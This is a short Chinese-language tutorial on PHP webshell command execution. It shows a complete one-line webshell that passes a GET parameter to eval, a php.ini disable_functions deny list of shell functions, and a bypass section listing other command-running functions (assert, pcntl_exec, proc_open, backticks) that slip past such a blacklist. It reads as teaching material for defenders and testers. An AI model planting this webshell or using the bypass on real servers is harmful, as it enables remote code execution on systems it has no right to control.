示例代码
<?php
$cmd = $_GET["cmd"];
echo "<pre>";
eval($cmd);
echo "</pre>";
?>
PHP webshell命令执行防御及绕过方法
0x00 PHP禁止webshell执行命令防御
PHP的配置文件php.ini里面有个disable_functions =
配置这个,禁止某些php函数,便可以禁止php的命令执行漏洞,例如:
disable_functions=system,passthru,shell_exec,exec,popen
0x01 PHP webshell命令执行绕过方法
1.黑名单绕过
php能够执行系统命令的函数有:
assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,`(反单引号)
根据黑名单中没有的函数,即可绕过。